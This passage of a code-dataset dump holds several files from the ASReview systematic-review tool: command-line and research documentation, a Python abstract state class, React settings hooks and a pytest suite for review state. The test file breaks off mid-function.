"Command Line\n============\n\nASReview provides a powerful command line interface for running\ntasks :doc:`start` and :doc:`simulation_cli`. Also :doc:`extensions_overview` often\nmake use of the command line interface by extending it with subcommands.\n\nThe structure of the command line is given by:\n\n.. code-block:: bash\n\n\tasreview [-h] [-V] [subcommand]\n\nA list of available and installed subcommands is given by :code:`asreview -h`.\nEach subcommand is listed with its subcommand, the package it comes from and\nthe version of the package. For example, the default subcommand ``lab``\n(to start ASReview LAB) is given by listed as ``lab [asreview-1.0]``. An\nsubcommand installed via an extension, e.g. ``plot``, is listed as ``plot\n[asreview-insights-1.1]`` where ``asreview-insights`` is the name of the\nextension that installed this subcommand and 1.1 is the version of this\npackage.\n" }, { "alpha_fraction": 0.5850231051445007, "alphanum_fraction": 0.5865288376808167, "avg_line_length": 28.043731689453125, "blob_id": "aceda00db229ec44ca77eed4b8299a750489f2f3", "content_id": "b99e8108ecd85b09ddc764bf9d5c4b879556e4a7", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9962, "license_type": "permissive", "max_line_length": 84, "num_lines": 343, "path": "/asreview/state/base.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom abc import ABC\nfrom abc import abstractmethod\n\n\nclass BaseState(ABC):\n def __init__(self, read_only=False):\n \"\"\"Abstract Base Class for state.\n\n read_only: bool\n Whether to open file in read only mode.\n \"\"\"\n self.read_only = read_only\n\n def __enter__(self):\n return self\n\n def __exit__(self, *_, **__):\n self.close()\n\n def __str__(self):\n return str(self.to_dict())\n\n @abstractmethod\n def _create_new_state_file(self, working_dir, review_id):\n \"\"\"Create empty internal structure for state.\n\n Arguments\n ---------\n working_dir: str, pathlib.Path\n Location of project file.\n review_id: str\n Identifier of the review.\n \"\"\"\n raise NotImplementedError\n\n @abstractmethod\n def _restore(self, working_dir, review_id):\n \"\"\"Restore state from a state file.\n\n Arguments\n ---------\n working_dir: str, pathlib.Path\n Location of project file.\n review_id: str\n Identifier of the review.\n \"\"\"\n raise NotImplementedError\n\n @abstractmethod\n def add_record_table(self, record_ids):\n \"\"\"Add the record table to the state.\n\n Arguments\n ---------\n record_ids: list-like\n List containing all record ids of the dataset.\n \"\"\"\n raise NotImplementedError\n\n @abstractmethod\n def add_last_probabilities(self, probabilities):\n \"\"\"Save the probabilities produced by the last classifier.\n\n Arguments\n ---------\n probabilities: list-like.\n List containing the probabilities for every record.\n \"\"\"\n raise NotImplementedError\n\n @abstractmethod\n def add_last_ranking(\n self,\n ranked_record_ids,\n classifier,\n query_strategy,\n balance_strategy,\n feature_extraction,\n training_set,\n ):\n \"\"\"Save the ranking of the last iteration of the model, in the ranking\n order.\n\n Arguments\n ---------\n ranked_record_ids: list, numpy.ndarray\n A list of records ids in the order that they were ranked.\n classifier: str\n Name of the classifier of the model.\n query_strategy: str\n Name of the query strategy of the model.\n balance_strategy: str\n Name of the balance strategy of the model.\n feature_extraction: str\n Name of the feature extraction method of the model.\n training_set: int\n Number of labeled records available at the time of training.\n \"\"\"\n raise NotImplementedError\n\n @abstractmethod\n def get_last_probabilities(self):\n \"\"\"Get the probabilities produced by the last classifier.\n\n Returns\n -------\n pd.Series:\n Series with name 'proba' containing the probabilities.\n \"\"\"\n raise NotImplementedError\n\n @property\n @abstractmethod\n def settings(self):\n \"\"\"Get settings from the state.\"\"\"\n raise NotImplementedError\n\n @abstractmethod\n def add_note(self, note, record_id):\n \"\"\"Add a text note to save with a labeled record.\n\n Arguments\n ---------\n note: str\n Text note to save.\n record_id: int\n Identifier of the record to which the note should be added.\n \"\"\"\n raise NotImplementedError\n\n @abstractmethod\n def add_labeling_data(self, record_ids, labels, notes=None, prior=False):\n \"\"\"Add the data corresponding to a labeling action to the state file.\n\n Arguments\n ---------\n record_ids: list, numpy.ndarray\n A list of ids of the labeled records as int.\n labels: list, numpy.ndarray\n A list of labels of the labeled records as int.\n notes: list of str/None\n A list of text notes to save with the labeled records.\n prior: bool\n Whether the added record are prior knowledge.\n \"\"\"\n raise NotImplementedError\n\n def update_decision(self, record_id, label, note=None):\n \"\"\"Change the label of an already labeled record.\n\n Arguments\n ---------\n record_id: int\n Id of the record whose label should be changed.\n label: 0 / 1\n New label of the record.\n note: str\n Note to add to the record.\n \"\"\"\n raise NotImplementedError\n\n def get_decision_changes(self):\n \"\"\"Get the record ids of the records whose labels have been changed\n after the original labeling action.\"\"\"\n raise NotImplementedError\n\n @abstractmethod\n def get_pool_labeled_pending(self):\n \"\"\"Return the labeled and unlabeled records and the records pending a\n labeling decision.\n\n Returns\n -------\n tuple (pd.Series, pd.DataFrame, pd.Series):\n Returns a tuple (pool, labeled, pending). Pool is a series\n containing the unlabeled, not pending record_ids, ordered by the\n last predicted ranking of the model. Labeled is a dataframe\n containing the record_ids and labels of the labeled records, in the\n order that they were labeled. Pending is a series containing the\n record_ids of the records whose label is pending.\n \"\"\"\n raise NotImplementedError\n\n def is_empty(self):\n \"\"\"Check if state has no results.\n\n Returns\n -------\n bool\n True if empty.\n \"\"\"\n return self.n_records_labeled == 0\n\n @property\n @abstractmethod\n def n_records_labeled(self):\n \"\"\"Number labeled records.\n\n Returns\n -------\n int\n Number of labeled records, priors counted individually.\n \"\"\"\n raise NotImplementedError\n\n @abstractmethod\n def get_dataset(self, columns=None):\n \"\"\"Get a column from the results table.\n\n Arguments\n ---------\n columns: list\n List of columns names of the results table.\n\n Returns\n -------\n pd.DataFrame:\n Dataframe containing the data of the specified columns of the\n results table.\n \"\"\"\n raise NotImplementedError\n\n def get_order_of_labeling(self):\n \"\"\"Get full array of record id's in order that they were labeled.\n\n Returns\n -------\n pd.Series:\n The record_id's in the order that they were labeled.\n \"\"\"\n raise NotImplementedError\n\n def get_labels(self):\n \"\"\"Get the labels from the state file.\n\n Returns\n -------\n pd.Series:\n Series containing the labels at each labelling moment.\n \"\"\"\n raise NotImplementedError\n\n def get_classifiers(self):\n \"\"\"Get the classifiers from the state file.\n\n Returns\n -------\n pd.Series:\n Series containing the classifier used at each labeling moment.\n \"\"\"\n raise NotImplementedError\n\n def get_query_strategies(self):\n \"\"\"Get the query strategies from the state file.\n\n Returns\n -------\n pd.Series:\n Series containing the query strategy used to get the record to\n query at each labeling moment.\n \"\"\"\n raise NotImplementedError\n\n def get_balance_strategies(self):\n \"\"\"Get the balance strategies from the state file.\n\n Returns\n -------\n pd.Series:\n Series containing the balance strategy used to get the training\n data at each labeling moment.\n \"\"\"\n raise NotImplementedError\n\n def get_feature_extraction(self):\n \"\"\"Get the query strategies from the state file.\n\n Returns\n -------\n pd.Series:\n Series containing the feature extraction method used for the\n classifier input at each labeling moment.\n \"\"\"\n raise NotImplementedError\n\n def get_training_sets(self):\n \"\"\"Get the training_sets from the state file.\n\n Returns\n -------\n pd.Series:\n Series containing the training set on which the classifier was\n fit at each labeling moment.\n \"\"\"\n raise NotImplementedError\n\n def get_labeling_times(self, time_format=\"int\"):\n \"\"\"Get the time of labeling the state file.\n\n Arguments\n ---------\n time_format: 'int' or 'datetime'\n Format of the return value. If it is 'int' you get a UTC timestamp,\n if it is 'datetime' you get datetime instead of an integer.\n\n Returns\n -------\n pd.Series:\n If format='int' you get a UTC timestamp (integer number of\n microseconds), if it is 'datetime' you get datetime format.\n \"\"\"\n raise NotImplementedError\n\n @abstractmethod\n def close(self):\n \"\"\"Close the files opened by the state.\"\"\"\n raise NotImplementedError\n\n def to_dict(self):\n \"\"\"Convert state to dictionary.\n\n Returns\n -------\n dict:\n Dictionary with all settings and results.\n \"\"\"\n state_data = self.get_dataset()\n state_dict = {\"settings\": vars(self.settings), \"data\": state_data.to_dict()}\n return state_dict\n" }, { "alpha_fraction": 0.6620327234268188, "alphanum_fraction": 0.6635773777961731, "avg_line_length": 26.66666603088379, "blob_id": "48461657fdf2db206a8e6eef8c5c61740df7c4e9", "content_id": "3bcace6cdb47d7c5db94284621fbf1bfc8b8b277", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 3237, "license_type": "permissive", "max_line_length": 80, "num_lines": 117, "path": "/asreview/webapp/src/hooks/SettingsHooks.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import { useEffect, useState } from \"react\";\n\nimport { fontSizeOptions, getDesignTokens } from \"../globals.js\";\n\nconst useRowsPerPage = () => {\n const [rowsPerPage, setRowsPerPage] = useState(5);\n\n const handleRowsPerPage = (rows) => {\n window.localStorage.setItem(\"rowsPerPage\", rows);\n setRowsPerPage(rows);\n };\n\n useEffect(() => {\n const localRowsPerPage = window.localStorage.getItem(\"rowsPerPage\");\n if (localRowsPerPage !== null && rowsPerPage !== localRowsPerPage) {\n setRowsPerPage(parseInt(localRowsPerPage));\n }\n }, [rowsPerPage]);\n\n return [rowsPerPage, handleRowsPerPage];\n};\n\nconst useDarkMode = () => {\n const [theme, setTheme] = useState(getDesignTokens(\"light\"));\n\n const toggleDarkMode = () => {\n if (theme.palette.mode === \"light\") {\n window.localStorage.setItem(\"themeType\", \"dark\");\n setTheme(getDesignTokens(\"dark\"));\n } else {\n window.localStorage.setItem(\"themeType\", \"light\");\n setTheme(getDesignTokens(\"light\"));\n }\n };\n\n useEffect(() => {\n const localTheme = window.localStorage.getItem(\"themeType\");\n if (theme.palette.mode !== localTheme && localTheme !== null) {\n setTheme(getDesignTokens(\"dark\"));\n }\n }, [theme.palette.mode]);\n\n return [theme, toggleDarkMode];\n};\n\nconst useFontSize = () => {\n const [fontSize, setFontSize] = useState(fontSizeOptions[1]);\n\n const handleFontSizeChange = (size) => {\n window.localStorage.setItem(\n \"fontSize\",\n JSON.stringify([size.value, size.label]),\n );\n setFontSize(size);\n };\n\n useEffect(() => {\n const localFontSize = JSON.parse(window.localStorage.getItem(\"fontSize\"));\n if (localFontSize !== null && fontSize.value !== localFontSize[0]) {\n setFontSize({\n value: localFontSize[0],\n label: localFontSize[1],\n });\n }\n }, [fontSize]);\n\n return [fontSize, handleFontSizeChange];\n};\n\nconst useUndoEnabled = () => {\n const [undoEnabled, setUndoEnabled] = useState(true);\n\n const toggleUndoEnabled = () => {\n window.localStorage.setItem(\"undoEnabled\", !undoEnabled);\n setUndoEnabled((a) => !a);\n };\n\n useEffect(() => {\n const localUndoEnabled = window.localStorage.getItem(\"undoEnabled\");\n const localUndoEnabledIsTrue = localUndoEnabled === \"true\";\n if (undoEnabled !== localUndoEnabledIsTrue && localUndoEnabled !== null) {\n setUndoEnabled(localUndoEnabledIsTrue);\n }\n }, [undoEnabled]);\n\n return [undoEnabled, toggleUndoEnabled];\n};\n\nconst useKeyPressEnabled = () => {\n const [keyPressEnabled, setKeyPressEnabled] = useState(false);\n\n const toggleKeyPressEnabled = () => {\n window.localStorage.setItem(\"keyPressEnabled\", !keyPressEnabled);\n setKeyPressEnabled((a) => !a);\n };\n\n useEffect(() => {\n const localKeyPressEnabled = window.localStorage.getItem(\"keyPressEnabled\");\n const localKeyPressEnabledIsTrue = localKeyPressEnabled === \"true\";\n if (\n keyPressEnabled !== localKeyPressEnabledIsTrue &&\n localKeyPressEnabled !== null\n ) {\n setKeyPressEnabled(localKeyPressEnabledIsTrue);\n }\n }, [keyPressEnabled]);\n\n return [keyPressEnabled, toggleKeyPressEnabled];\n};\n\nexport {\n useRowsPerPage,\n useDarkMode,\n useFontSize,\n useUndoEnabled,\n useKeyPressEnabled,\n};\n" }, { "alpha_fraction": 0.7676130533218384, "alphanum_fraction": 0.783035397529602, "avg_line_length": 54.94117736816406, "blob_id": "f034e0bd16c7b40f0e140cdc119cef1661665945", "content_id": "f07bf04bf05613d4de630bcdb9bf110f5216b0b6", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2853, "license_type": "permissive", "max_line_length": 544, "num_lines": 51, "path": "/docs/source/research.rst", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "Research\n========\n\nThe open source ASReview LAB software is one of the products of the `ASReview\nresearch project <https://asreview.ai/about/>`_. The ASReview research project\nis a fundamental and applied research project studying the application of AI\nin the field of systematically reviewing large amounts of text data. \n\n \n\n.. note::\n \n The ASReview project is developed by researchers for researchers, and anyone is welcome to join the community!\n\nThere are still 1001 scientific papers that can be published using the\nASReview products. We welcome researchers worldwide to work on papers like\napplying the existing models to new types of datasets (different scientific\nfields, other languages, multilanguage data, text data outside academia,\nlarge datasets, etcetera), adding new models and testing the performance on\nthe available benchmark datasets, adding and testing new stopping rules or\nperformance metrics, and so on! \n\n\nScientific principles\n---------------------\n\nThe research team works according to the Open Science principles and invests in an\ninclusive community contributing to the project. In short, research is\nconducted according to the following fundamental principles:\n\n- Research output should be `FAIR <https://www.uu.nl/en/research/open-science>`_ (Findable Accessible Interoperable and Reusable).\n- Research should be conducted with integrity, and we commit ourselves to the `Netherlands Code of Conduct for Research Integrity <https://www.nwo.nl/en/netherlands-code-conduct-research-integrity>`_.\n- Output should be rewarded according to the Declaration on Research Assessment (`DORA <https://sfdora.org/read/>`_).\n\n\nUtrecht University has established `specific regulations <https://www.uu.nl/en/organisation/about-us/codes-of-conduct>`_ governing conduct for its employees. These are based on the key principles of professional and quality academic conduct and ethically-responsible research. Members of the team employed by Utrecht University, commit themselves to these regulations in all their conduct, including all work related to ASReview. Adherence to similar key principles is expected of all researchers involved in all facets of the ASReview project.\n\nCite\n----\n\nFor scientific use, we encourage users to cite:\n\n- The paper published in `Nature Machine Intelligence <https://www.nature.com/articles/s42256-020-00287-7>`_ to cite the **ASReview project**.\n\n- For citing the software **ASReview LAB**, refer to the `specific release\n <https://doi.org/10.5281/zenodo.3345592>`_ of the software. The menu on the\n right (in Zenodo) can be used to find the citation format of prevalence.\n\n- For citing the documentation (or to download the pdf) go to `Zenodo <https://doi.org/10.5281/zenodo.4287119>`_.\n\n- More studies related to the project can be found on `asreview.ai/research <https://asreview.ai/research/>`_.\n" }, { "alpha_fraction": 0.5878220200538635, "alphanum_fraction": 0.6256759762763977, "avg_line_length": 33.48604965209961, "blob_id": "a4106fd37be93a382ec4da2ac8f67d755f49c173", "content_id": "c1d75195aef88d7ad7f3822f97dbb02f95ae4e07", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 23485, "license_type": "permissive", "max_line_length": 88, "num_lines": 681, "path": "/tests/test_state.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "from pathlib import Path\nfrom sqlite3 import OperationalError\n\nimport pandas as pd\nimport pytest\nfrom scipy.sparse import csr_matrix\n\nfrom asreview import ASReviewData\nfrom asreview.project import ASReviewProject\nfrom asreview.project import ProjectExistsError\nfrom asreview.project import open_state\nfrom asreview.settings import ASReviewSettings\nfrom asreview.state import SQLiteState\nfrom asreview.state.errors import StateNotFoundError\nfrom asreview.state.sqlstate import RESULTS_TABLE_COLUMNS\n\nTEST_LABELS = [1, 0, 0, 1, 1, 1, 0, 1, 1, 1]\nTEST_INDICES = [16, 346, 509, 27, 11, 555, 554, 680, 264, 309]\nTEST_RECORD_IDS = [17, 347, 510, 28, 12, 556, 555, 681, 265, 310]\nTEST_RECORD_TABLE = list(range(851))\nTEST_CLASSIFIERS = [None, None, None, None, \"nb\", \"nb\", \"nb\", \"nb\", \"nb\", \"nb\"]\nTEST_QUERY_STRATEGIES = [\n \"prior\",\n \"prior\",\n \"prior\",\n \"prior\",\n \"max\",\n \"max\",\n \"max\",\n \"max\",\n \"max\",\n \"max\",\n]\nTEST_BALANCE_STRATEGIES = [\n None,\n None,\n None,\n None,\n \"double\",\n \"double\",\n \"double\",\n \"double\",\n \"double\",\n \"double\",\n]\nTEST_FEATURE_EXTRACTION = [\n None,\n None,\n None,\n None,\n \"tfidf\",\n \"tfidf\",\n \"tfidf\",\n \"tfidf\",\n \"tfidf\",\n \"tfidf\",\n]\nTEST_TRAINING_SETS = [-1, -1, -1, -1, 4, 5, 6, 7, 8, 9]\nTEST_NOTES = [\n None,\n None,\n None,\n \"random text\",\n \"another random text\",\n None,\n None,\n \"A final random text\",\n None,\n None,\n]\n\nTEST_N_PRIORS = 4\nTEST_N_MODELS = 7\n\nTEST_STATE_FP = Path(\"tests\", \"asreview_files\", \"test_state_example_converted.asreview\")\nTEST_WITH_TIMES_FP = Path(\n \"tests\", \"asreview_files\", \"test_state_example_with_times.asreview\"\n)\nTEST_LABELING_TIMES = [\n \"2021-09-30 17:54:07.569255\",\n \"2021-09-30 17:54:07.569255\",\n \"2021-09-30 17:54:28.860270\",\n \"2021-09-30 17:54:28.860270\",\n \"2021-09-30 17:54:28.860270\",\n \"2021-09-30 17:54:31.689389\",\n \"2021-09-30 17:54:33.505257\",\n \"2021-09-30 17:54:35.842416\",\n \"2021-09-30 17:54:38.245108\",\n]\n\nTEST_FIRST_PROBS = [\n 0.7107394917661797,\n 0.7291694332065035,\n 0.732624685298732,\n 0.7017866934752249,\n 0.7275304788204621,\n 0.7126109527686055,\n 0.7246720268636593,\n 0.7040374218528891,\n 0.7095665447517838,\n 0.7021937381372063,\n]\nTEST_LAST_PROBS = [\n 0.7116408177006979,\n 0.7119557616570122,\n 0.71780127925996,\n 0.7127075014419986,\n 0.7085644453092131,\n 0.7067520535764322,\n 0.7103161247883791,\n 0.7192568428839242,\n 0.7118104532649111,\n 0.7150387267232563,\n]\nTEST_POOL_START = [157, 301, 536, 567, 416, 171, 659, 335, 329, 428]\n\n\ndef test_init_project_folder(tmpdir):\n project_path = Path(tmpdir, \"test.asreview\")\n project = ASReviewProject.create(project_path)\n\n assert Path(project_path, \"project.json\").is_file()\n assert Path(project_path, \"data\").is_dir()\n assert Path(project_path, \"feature_matrices\").is_dir()\n assert Path(project_path, \"reviews\").is_dir()\n\n assert project.config[\"id\"] == \"test\"\n\n\ndef test_init_project_already_exists(tmpdir):\n project_path = Path(tmpdir, \"test.asreview\")\n ASReviewProject.create(project_path)\n with pytest.raises(ProjectExistsError):\n ASReviewProject.create(project_path)\n\n\ndef test_invalid_project_folder():\n with pytest.raises(StateNotFoundError):\n with open_state(\"this_is_not_a_project\") as state: # noqa\n pass\n\n\ndef test_state_not_found(tmpdir):\n project_path = Path(tmpdir, \"test.asreview\")\n ASReviewProject.create(project_path)\n with pytest.raises(StateNotFoundError):\n with open_state(project_path) as state: # noqa\n pass\n\n\ndef test_read_basic_state():\n with open_state(TEST_STATE_FP) as state:\n assert isinstance(state, SQLiteState)\n\n\ndef test_version_number_state():\n with open_state(TEST_STATE_FP) as state:\n assert state.version[0] == \"1\"\n\n\ndef test_write_while_read_only_state():\n with open_state(TEST_STATE_FP, read_only=True) as state:\n with pytest.raises(OperationalError):\n state.add_last_probabilities([1.0] * len(TEST_RECORD_TABLE))\n\n\ndef test_print_state():\n with open_state(TEST_STATE_FP, read_only=True) as state:\n print(state)\n\n\ndef test_settings_state():\n with open_state(TEST_STATE_FP) as state:\n assert isinstance(state.settings, ASReviewSettings)\n\n\ndef test_n_records_labeled():\n with open_state(TEST_STATE_FP) as state:\n assert state.n_records_labeled == len(TEST_LABELS)\n\n\ndef test_n_priors():\n with open_state(TEST_STATE_FP) as state:\n assert state.n_priors == TEST_N_PRIORS\n\n\ndef test_create_new_state_file(tmpdir):\n project_path = Path(tmpdir, \"test.asreview\")\n ASReviewProject.create(project_path)\n with open_state(project_path, read_only=False) as state:\n state._is_valid_state()\n\n\ndef test_get_dataset():\n with open_state(TEST_STATE_FP) as state:\n assert isinstance(state.get_dataset([\"query_strategy\"]), pd.DataFrame)\n assert isinstance(state.get_dataset(), pd.DataFrame)\n\n # Try getting a specific column.\n assert (\n state.get_dataset([\"record_id\"])[\"record_id\"].to_list() == TEST_RECORD_IDS\n )\n assert (\n state.get_dataset([\"feature_extraction\"])[\"feature_extraction\"].to_list()\n == TEST_FEATURE_EXTRACTION\n )\n # Try getting all columns and that picking the right column.\n assert (\n state.get_dataset()[\"balance_strategy\"].to_list() == TEST_BALANCE_STRATEGIES\n )\n # Try getting a specific column with column name as string, instead of\n # list containing column name.\n assert (\n state.get_dataset(\"training_set\")[\"training_set\"].to_list()\n == TEST_TRAINING_SETS\n )\n\n\ndef test_get_dataset_drop_prior():\n with open_state(TEST_STATE_FP) as state:\n assert (\n len(state.get_dataset(priors=False)) == len(TEST_RECORD_IDS) - TEST_N_PRIORS\n )\n assert (state.get_dataset(priors=False)[\"query_strategy\"] != \"prior\").all()\n assert \"query_strategy\" in state.get_dataset(priors=False).columns\n assert \"query_strategy\" not in state.get_dataset(\"label\", priors=False)\n\n\ndef test_get_dataset_drop_pending(tmpdir):\n record_table = range(1, 11)\n test_ranking = range(10, 0, -1)\n project_path = Path(tmpdir, \"test.asreview\")\n ASReviewProject.create(project_path)\n with open_state(project_path, read_only=False) as state:\n state.add_record_table(record_table)\n state.add_last_ranking(test_ranking, \"nb\", \"max\", \"double\", \"tfidf\", 4)\n state.add_labeling_data([4, 5, 6], [1, 0, 1], prior=True)\n state.query_top_ranked(3)\n\n assert \"label\" in state.get_dataset(pending=False).columns\n assert \"label\" not in state.get_dataset(\"balance_strategy\", pending=False)\n assert len(state.get_dataset(pending=False)) == 3\n assert state.get_dataset(pending=False)[\"label\"].notna().all()\n\n\ndef test_get_data_by_query_number():\n with open_state(TEST_STATE_FP) as state:\n query = state.get_data_by_query_number(0)\n assert list(query.columns) == RESULTS_TABLE_COLUMNS\n assert (\n query[\"balance_strategy\"].tolist()\n == TEST_BALANCE_STRATEGIES[:TEST_N_PRIORS]\n )\n assert query[\"classifier\"].tolist() == TEST_CLASSIFIERS[:TEST_N_PRIORS]\n\n for query_num in [1, 3, 5]:\n query_idx = query_num + TEST_N_PRIORS - 1\n query = state.get_data_by_query_number(query_num)\n assert isinstance(query, pd.DataFrame)\n assert (\n query[\"feature_extraction\"].to_list()[0]\n == TEST_FEATURE_EXTRACTION[query_idx]\n )\n assert query[\"label\"].to_list()[0] == TEST_LABELS[query_idx]\n assert query[\"record_id\"].to_list()[0] == TEST_RECORD_IDS[query_idx]\n\n columns = RESULTS_TABLE_COLUMNS[2:5]\n query = state.get_data_by_query_number(4, columns)\n assert list(query.columns) == columns\n\n\ndef test_get_data_by_record_id():\n with open_state(TEST_STATE_FP) as state:\n for idx in [2, 6, 8]:\n record_id = TEST_RECORD_IDS[idx]\n query = state.get_data_by_record_id(record_id)\n assert isinstance(query, pd.DataFrame)\n assert query[\"training_set\"].to_list()[0] == TEST_TRAINING_SETS[idx]\n assert query[\"record_id\"].to_list()[0] == TEST_RECORD_IDS[idx]\n\n\ndef test_get_query_strategies():\n with open_state(TEST_STATE_FP) as state:\n assert isinstance(state.get_query_strategies(), pd.Series)\n assert state.get_query_strategies().to_list() == TEST_QUERY_STRATEGIES\n\n\ndef test_get_classifiers():\n with open_state(TEST_STATE_FP) as state:\n assert isinstance(state.get_classifiers(), pd.Series)\n assert state.get_classifiers().to_list() == TEST_CLASSIFIERS\n\n\ndef test_get_training_sets():\n with open_state(TEST_STATE_FP) as state:\n assert isinstance(state.get_training_sets(), pd.Series)\n assert all(state.get_training_sets() == TEST_TRAINING_SETS)\n\n\ndef test_get_order_of_labeling():\n with open_state(TEST_STATE_FP) as state:\n assert isinstance(state.get_order_of_labeling(), pd.Series)\n assert all(state.get_order_of_labeling() == TEST_RECORD_IDS)\n\n\ndef test_get_labels():\n with open_state(TEST_STATE_FP) as state:\n assert isinstance(state.get_labels(), pd.Series)\n assert all(state.get_labels() == TEST_LABELS)\n\n\ndef test_get_labels_no_priors():\n with open_state(TEST_STATE_FP) as state:\n labels = state.get_labels(priors=False)\n assert isinstance(labels, pd.Series)\n assert all(labels == TEST_LABELS[4:])\n\n\ndef test_get_labeling_times():\n with open_state(TEST_WITH_TIMES_FP) as state:\n assert isinstance(state.get_labeling_times(), pd.Series)\n assert all(state.get_labeling_times() == TEST_LABELING_TIMES)\n\n\ndef test_create_empty_state(tmpdir):\n project_path = Path(tmpdir, \"test.asreview\")\n ASReviewProject.create(project_path)\n with open_state(project_path, read_only=False) as state:\n assert state.is_empty()\n\n\ndef test_get_feature_matrix():\n project = ASReviewProject(TEST_STATE_FP)\n\n assert len(project.feature_matrices) == 1\n\n feature_matrix = project.get_feature_matrix(project.feature_matrices[0][\"id\"])\n assert isinstance(feature_matrix, csr_matrix)\n\n\ndef test_get_record_table():\n with open_state(TEST_STATE_FP) as state:\n record_table = state.get_record_table()\n assert isinstance(record_table, pd.Series)\n assert record_table.name == \"record_id\"\n assert record_table.to_list() == TEST_RECORD_TABLE\n\n\ndef test_record_table(tmpdir):\n data_fp = Path(\"tests\", \"demo_data\", \"record_id.csv\")\n as_data = ASReviewData.from_file(data_fp)\n\n project_path = Path(tmpdir, \"test.asreview\")\n ASReviewProject.create(project_path)\n\n with open_state(project_path, read_only=False) as state:\n state.add_record_table(as_data.record_ids)\n assert state.get_record_table().to_list() == list(range(len(as_data)))\n\n\ndef test_get_last_probabilities():\n with open_state(TEST_STATE_FP) as state:\n probabilities = state.get_last_probabilities()\n assert isinstance(probabilities, pd.Series)\n assert probabilities.name == \"proba\"\n assert probabilities.to_list()[:10] == TEST_FIRST_PROBS\n assert probabilities.to_list()[-10:] == TEST_LAST_PROBS\n\n\ndef test_add_last_probabilities_fail():\n with open_state(TEST_STATE_FP) as state:\n with pytest.raises(ValueError):\n state.add_last_probabilities([1.0, 2.0, 3.0])\n\n\ndef test_add_last_probabilities(tmpdir):\n project_path = Path(tmpdir, \"test.asreview\")\n ASReviewProject.create(project_path)\n probabilities = [float(num) for num in range(50)]\n with open_state(project_path, read_only=False) as state:\n state.add_last_probabilities(probabilities)\n state_probabilities = state.get_last_probabilities().to_list()\n assert state_probabilities == probabilities\n\n\ndef test_move_ranking_data_to_results(tmpdir):\n project_path = Path(tmpdir, \"test.asreview\")\n ASReviewProject.create(project_path)\n with open_state(project_path, read_only=False) as state:\n state.add_record_table(TEST_RECORD_TABLE)\n state.add_last_ranking(\n range(1, len(TEST_RECORD_TABLE) + 1), \"nb\", \"max\", \"double\", \"tfidf\", 4\n )\n state._move_ranking_data_to_results([4, 6, 5, 7])\n\n data = state.get_dataset(pending=True)\n assert data[\"record_id\"].to_list() == [4, 6, 5, 7]\n assert data[\"label\"].to_list() == [None] * 4\n assert data[\"classifier\"].to_list() == [\"nb\"] * 4\n\n\ndef test_query_top_ranked(tmpdir):\n test_ranking = [2, 1, 0] + list(range(3, len(TEST_RECORD_TABLE)))\n project_path = Path(tmpdir, \"test.asreview\")\n ASReviewProject.create(project_path)\n with open_state(project_path, read_only=False) as state:\n state.add_record_table(TEST_RECORD_TABLE)\n state.add_last_ranking(test_ranking, \"nb\", \"max\", \"double\", \"tfidf\", 4)\n top_ranked = state.query_top_ranked(5)\n\n assert top_ranked == [2, 1, 0, 3, 4]\n data = state.get_dataset(pending=True)\n assert data[\"record_id\"].to_list() == [2, 1, 0, 3, 4]\n assert data[\"classifier\"].to_list() == [\"nb\"] * 5\n assert data[\"query_strategy\"].to_list() == [\"max\"] * 5\n assert data[\"balance_strategy\"].to_list() == [\"double\"] * 5\n assert data[\"feature_extraction\"].to_list() == [\"tfidf\"] * 5\n assert data[\"training_set\"].to_list() == [4] * 5\n\n\ndef test_add_labeling_data(tmpdir):\n test_ranking = list(range(len(TEST_RECORD_TABLE)))\n project_path = Path(tmpdir, \"test.asreview\")\n ASReviewProject.create(project_path)\n with open_state(project_path, read_only=False) as state:\n state.add_record_table(TEST_RECORD_TABLE)\n state.add_last_ranking(test_ranking, \"nb\", \"max\", \"double\", \"tfidf\", 4)\n for i in range(3):\n # Test without specifying notes.\n state.add_labeling_data([TEST_RECORD_IDS[i]], [TEST_LABELS[i]], prior=True)\n\n # Test with specifying notes and with larger batch.\n state.add_labeling_data(\n TEST_RECORD_IDS[3:6], TEST_LABELS[3:6], notes=TEST_NOTES[3:6], prior=True\n )\n\n data = state.get_dataset(pending=True)\n assert data[\"record_id\"].to_list() == TEST_RECORD_IDS[:6]\n assert data[\"label\"].to_list() == TEST_LABELS[:6]\n assert data[\"classifier\"].to_list() == [None] * 6\n assert data[\"query_strategy\"].to_list() == [\"prior\"] * 6\n assert data[\"balance_strategy\"].to_list() == [None] * 6\n assert data[\"feature_extraction\"].to_list() == [None] * 6\n assert data[\"training_set\"].to_list() == [-1] * 6\n assert data[\"notes\"].to_list() == TEST_NOTES[:6]\n\n state.query_top_ranked(3)\n data = state.get_dataset(pending=True)\n assert data[\"label\"].to_list()[:6] == TEST_LABELS[:6]\n assert data[\"label\"][6:].isna().all()\n assert data[\"record_id\"].to_list() == TEST_RECORD_IDS[:6] + [0, 1, 2]\n\n state.add_labeling_data([1], [1])\n labels = state.get_labels(pending=True)\n assert labels.to_list()[:6] == TEST_LABELS[:6]\n assert labels[7] == 1\n\n state.add_labeling_data([0, 2], [0, 1], notes=[\"note0\", \"note2\"])\n data = state.get_dataset(pending=True)\n assert data[\"label\"].to_list() == TEST_LABELS[:6] + [0, 1, 1]\n assert data[\"notes\"].to_list() == TEST_NOTES[:6] + [\"note0\", None, \"note2\"]\n\n\ndef test_pool_labeled_pending(tmpdir):\n record_table = range(1, 11)\n test_ranking = range(10, 0, -1)\n project_path = Path(tmpdir, \"test.asreview\")\n ASReviewProject.create(project_path)\n with open_state(project_path, 